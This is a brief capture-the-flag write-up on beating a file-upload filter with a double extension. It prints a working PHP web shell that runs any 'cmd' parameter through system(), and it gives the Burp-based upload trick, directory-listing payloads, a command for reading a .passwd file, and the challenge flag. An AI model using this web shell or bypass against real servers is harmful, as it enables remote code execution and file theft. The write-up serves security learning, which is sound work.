← Back
File-upload-Double-extensions | Avishai’s CTF Writeups

Avishai's CTF Writeups

Yalla Balagan! A collection of my CTF writeups and solutions.

View on GitHub

Here we try to upload our webshell.php file:

<?php
if (isset($_GET['cmd'])) {
    echo "<pre>" . system($_GET['cmd']) . "</pre>";
}
?>

However, we get this message: Wrong file extension !, so let’s add manually via burp repeater the extension .jpg upload webshell

Now, i look for .passwd file, just insert this payload ?cmd=ls . -la, and then if not, move down: ?cmd=ls ../.. -la

Last payload will be: cat ../../../.passwd FLAG

Flag: Gg9LRz-hWSxqqUKd77-_q-6G8